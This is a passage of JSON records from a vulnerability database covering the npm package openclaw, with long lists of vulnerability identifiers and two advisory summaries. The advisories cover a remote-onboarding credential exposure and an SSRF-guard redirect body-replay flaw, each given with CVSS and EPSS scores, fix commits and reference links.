,{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-77hf-7fqf-f227"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wfsp-szhr-r7eu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91802?format=json","vulnerability_id":"VCID-wkye-je9r-1fba","summary":"OpenClaw: CLI Remote Onboarding Persists Unauthenticated Discovery Endpoint and Exfiltrates Gateway Credentials\n## Summary\n\nRemote onboarding accepted discovered gateway endpoints without an explicit trust confirmation before persisting the remote URL and connection details.\n\n## Impact\n\nA malicious or spoofed discovery endpoint could steer onboarding toward an attacker-controlled gateway and capture future gateway credentials or traffic.\n\n## Affected Component\n\n`src/commands/onboard-remote.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d6affb17d8` (`CLI: confirm discovered remote gateways before saving config`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41342","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02906","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02957","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0295","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41342"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41342","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41342"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding"},{"reference_url":"https://github.com/advisories/GHSA-3cw3-5vxw-g2h3","reference_id":"GHSA-3cw3-5vxw-g2h3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3cw3-5vxw-g2h3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41342","GHSA-3cw3-5vxw-g2h3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wkye-je9r-1fba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90198?format=json","vulnerability_id":"VCID-wmr3-83u3-6qdb","summary":"OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n## Impact\n\n`fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects.\n\nA guarded fetch could resend unsafe request bodies or headers when following cross-origin redirects.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<2026.3.31`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @BG0ECV for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40037","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11509","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11475","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11511","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40037"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40037","reference_id":